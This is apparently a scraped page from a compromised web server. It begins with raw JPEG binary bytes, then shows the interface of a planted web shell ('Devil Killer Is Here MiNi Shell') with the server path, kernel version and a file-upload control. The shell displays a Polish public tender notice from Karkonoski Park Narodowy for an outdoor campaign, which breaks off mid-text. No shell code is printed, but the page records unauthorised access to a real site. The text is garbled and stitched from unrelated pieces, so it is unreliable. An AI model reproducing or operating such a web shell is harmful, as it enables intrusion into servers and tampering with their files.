JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230622/0027204101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> KPN/15/2023 Outdoorowa kampania społeczna „Głowa do góry” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Karkonoski Park Narodowy z siedzibą w Jeleniej Górze</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 021781314</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Cieplicka 196</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jelenia Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-570</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(075) 75 537 26</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(075) 756099113</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@kpnmab.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kpnmab.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> KPN/15/2023 Outdoorowa kampania społeczna „Głowa do góry” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-85d38b9d-10e6-11ee-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00272041</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00043499/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Kampania outdoorowa</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-85d38b9d-10e6-11ee-b70f-ae2d9e28ec7b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>2. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: przetargi@kpnmab.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>2.Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>3.Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych z dnia 30 grudnia 2020 r (Dz. U. 2020 poz. 2452)<br/>4.Dokumenty elektroniczne,o których mowa w w/w § 2 ust. 1 rozporządzenia, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. (Dz. U. z 2017 r. poz. 2247), z uwzg.rodzaju przekazywanych danych i przekazuje się jako załączniki.<br/>5.Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a)w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub<br/>b)jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>6.Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16.04.1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz. 1233 z późn. zm.) Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>7.Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za ich pośrednictwem odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi.<br/>8.Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>9.Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>10.Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>11.Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>12.W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, dopuszcza się komunikację za pomocą poczty elektronicznej na adres e-mail: przetargi@kpnmab.pl (nie dotyczy składania ofert).<br/>13.Wykonawca po upływie terminu do składania ofert nie może skutecznie dokonać zmiany ani wycofać złożonej oferty.<br/>14.Zamawiający rekomenduje format danych przesyłanych plików: pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1)	Administratorem danych osobowych jest Karkonoski Park Narodowy z siedzibą w Jeleniej Górze ul. Cieplicka 196; 58-570 Jelenia Góra, tel. 75 75 537 26, adres mail: sekretariat@kpnmab.pl;<br/>2)	Inspektorem ochrony danych osobowych w Karkonoskim Parku Narodowym <br/>z siedzibą w Jeleniej Górze jest: Leszek Wierzbicki; ido@kpnmab.pl<br/>Wskazane dane osobowe przez Wykonawcę przetwarzane będą na podstawie art. 6 ust. 1 lit.c RODO w celu związanym z postępowaniem pt.: „Outdoorowa kampania społeczna „Głowa do góry”” prowadzonym w trybie podstawowym z fakultatywnymi negocjacjami. <br/>3)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t.j Dz. U. z 2023 r., poz. 412 i 825), dalej „ustawa Pzp”; <br/>4)	Wskazane dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 p.z.p., przez okres do 2028 roku od dnia zakończenia postępowania o udzielenie zamówienia<br/>5)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; <br/>6)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>7)	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących*;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/><br/>8)	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>9)	przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Panu danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KPN/15/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa „Outdoorowa kampania społeczna „Głowa do góry” dla projektu pn.: „Poprawa łączności ekologicznej w Karkonoskim Parku Narodowym i jego otulinie” dofinansowanego ze środków Mechanizmu Finansowego EOG na lata 2014 —2021 spełniającego wszystkie wymagania szczegółowe jak poniżej. Przedmiot zamówienia został podzielony na Pakiety:<br/>Pakiet 1 – obejmuje 50 szt. nośników na terenie Wrocławia <br/>Szczegółowy opis przedmiotu zamówienia:<br/>1)	Czas trwania ekspozycji: ekspozycja ciągła przez min. 14 dni, w wybranym przedziale czasu w okresie od dnia podpisania umowy do 30 sierpnia 2023r.<br/>2)	Liczba nośników: min. 200 sztuk (Pakiet 1 - 50 szt. Wrocław, )<br/>3)	Rodzaj nośników: m.in. tzw. citylight (naścienne, wolnostojące, na wiatach przystankowych), ekrany digitalowe, billboardy, słupy reklamowe, reklamy skrolowane <br/>i inne (w miejscach umożliwiających dotarcie kampanii do jak najszerszego kręgu odbiorców). Lokalizacje bilbordów powinny znajdować się przy ruchliwych ciągach komunikacyjnych pieszych i samochodowych, nieprzesłoniętych innymi budynkami, drzewami, ogrodzeniami, rusztowaniami itp. Wykonawca powinien uwzględnić główne arterie komunikacyjne w danych miastach. <br/>4)	Specyfikacja nośników: Wymiary minimalne nośników: 110 cm x 170 cm, min. 80% nośników oświetlonych, <br/>5)	Spełnienie parametrów zasięgu kampanii wskaźnikiem liczby bezpośrednich kontaktów – VAC (Visibility Adjusted Contact): w sumie wszystkich nośników min. 20 000 000, według poniższego podziału:<br/>Pakiet 1 - min. 5 000 000 Wrocław, <br/>Wykonawca wraz z protokołem odbioru będzie zobowiązany przedstawić szczegółową listę nośników wraz z rzeczywistą ilością kontaktów (zasięgiem). Pod pojęciem VAC rozumie szacunkową liczbę osób, które zetknęły się w danym miejscu z informacją umieszczoną na nośniku w ciągu jednej doby, potwierdzona badaniami, np. tzw. outdoor track prowadzony przez Wykonawcę w ostatnich trzech latach.<br/>6)	Wykonawca wykona druk przesłanych przez Zamawiającego kreacji (4 kreacje we wskazanych przez wykonawcę formatach), zapewni wykonanie montażu i utrzymanie nośników.<br/>7)	Dokładna lokalizacja każdego z nośników zaproponowanych przez Wykonawcę do wykorzystania przy realizacji kampanii informacyjnej wymagać będzie akceptacji ze strony Zamawiającego. W przypadku braku akceptacji pierwszej lokalizacji któregokolwiek z nośników, Wykonawca zobowiązany jest do przedstawienia lokalizacji alternatywnej. Nośniki powinny być estetyczne, wolne od jakichkolwiek form graffiti lub innych malowideł oraz trwałych zabrudzeń. Materiały informacyjne umieszczone na nośniku muszą być w całości widoczne (nie zasłonięte przez inne elementy infrastruktury miejskiej). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79342200-5 - Usługi w zakresie promocji</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1.	Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 PZP, w okresie 3 lat od dnia udzielenia zamówienia podstawowego do wysokości 20% wartości zamówienia. Zamówienia te polegać będą na powtórzeniu usług podobnych do usług stanowiących przedmiot niniejszego zamówienia.<br/>2.	Opis zamówień, o których mowa w art. 214 ust. 1 pkt 7 PZP został zawarty w opisie przedmiotu zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">A.	Kryterium „Cena” w PLN:<br/>a)	znaczenie kryterium - 60% (0,6);<br/>b)	opis sposobu oceny ofert dla kryterium „Ceny”: <br/>Ccena = (Cmin / C) x 0,6 x 100 pkt<br/>gdzie:<br/>Ccena - liczba uzyskanych punktów dla kryterium „Cena” ocenianej oferty<br/>Cmin - cena w ofercie z najniższą ceną<br/>C - cena w ofercie ocenianej <br/><br/>Pakiet 1:<br/>B. Kryterium: „Dodatkowe nośniki powyżej 50 sztuk&#34;, dla każdego z pakietów<br/>a)	znaczenie kryterium - 40% (0,4);<br/>b)	opis sposobu oceny ofert dla kryterium „Dodatkowe nośniki powyżej 50 sztuk”: <br/>Maksymalna liczba dodatkowych nośników: 20 sztuk dla każdego z pakietów 1, 2<br/>G(x)=(H(x) /H(max)) x 0,4 x 100<br/>Gdzie: <br/> G(x) – ilość punktów przyznana ofercie „x” za liczbę dodatkowych nośników<br/> H (x) – Liczba dodatkowych nośników w ofercie ocenianej <br/> H(max) – Liczba dodatkowych nośników w ofercie z najwyższą liczbą nośników ”<br/>Ogólna ocena oferty suma punktów w kryteriach: „cena”, i „Dodatkowe nośniki”:<br/>A+B = maksymalnie 100 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe nośniki powyżej 50 sztuk</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa „Outdoorowa kampania społeczna „Głowa do góry” dla projektu pn.: „Poprawa łączności ekologicznej w Karkonoskim Parku Narodowym i jego otulinie” dofinansowanego ze środków Mechanizmu Finansowego EOG na lata 2014 —2021 spełniającego wszystkie wymagania szczegółowe jak poniżej. Przedmiot zamówienia został podzielony na Pakiety:<br/>Pakiet 2 – obejmuje 50 szt. nośników na terenie Poznania<br/>Szczegółowy opis przedmiotu zamówienia:<br/>1)	Czas trwania ekspozycji: ekspozycja ciągła przez min. 14 dni, w wybranym przedziale czasu w okresie od dnia podpisania umowy do 30 sierpnia 2023r.<br/>2)	Liczba nośników: min. 200 sztuk (Pakiet 2 - 50 szt. Poznań)<br/>3)	Rodzaj nośników: m.in. tzw. citylight (naścienne, wolnostojące, na wiatach przystankowych), ekrany digitalowe, billboardy, słupy reklamowe, reklamy skrolowane <br/>i inne (w miejscach umożliwiających dotarcie kampanii do jak najszerszego kręgu odbiorców). Lokalizacje bilbordów powinny znajdować się przy ruchliwych ciągach komunikacyjnych pieszych i samochodowych, nieprzesłoniętych innymi budynkami, drzewami, ogrodzeniami, rusztowaniami itp. Wykonawca powinien uwzględnić główne arterie komunikacyjne w danych miastach. <br/>4)	Specyfikacja nośników: Wymiary minimalne nośników: 110 cm x 170 cm, min. 80% nośników oświetlonych, <br/>5)	Spełnienie parametrów zasięgu kampanii wskaźnikiem liczby bezpośrednich kontaktów – VAC (Visibility Adjusted Contact): w sumie wszystkich nośników min. 20 000 000, według poniższego podziału:<br/>Pakiet 2 - min. 5 000 000 Poznań. <br/>Wykonawca wraz z protokołem odbioru będzie zobowiązany przedstawić szczegółową listę nośników wraz z rzeczywistą ilością kontaktów (zasięgiem). Pod pojęciem VAC rozumie szacunkową liczbę osób, które zetknęły się w danym miejscu z informacją umieszczoną na nośniku w ciągu jednej doby, potwierdzona badaniami, np. tzw. outdoor track prowadzony przez Wykonawcę w ostatnich trzech latach.<br/>6)	Wykonawca wykona druk przesłanych przez Zamawiającego kreacji (4 kreacje we wskazanych przez wykonawcę formatach), zapewni wykonanie montażu i utrzymanie nośników.<br/>7)	Dokładna lokalizacja każdego z nośników zaproponowanych przez Wykonawcę do wykorzystania przy realizacji kampanii informacyjnej wymagać będzie akceptacji ze strony Zamawiającego. W przypadku braku akceptacji pierwszej lokalizacji któregokolwiek z nośników, Wykonawca zobowiązany jest do przedstawienia lokalizacji alternatywnej. Nośniki powinny być estetyczne, wolne od jakichkolwiek form graffiti lub innych malowideł oraz trwałych zabrudzeń. Materiały informacyjne umieszczone na nośniku muszą być w całości widoczne (nie zasłonięte przez inne elementy infrastruktury miejskiej). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79342200-5 - Usługi w zakresie promocji</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty 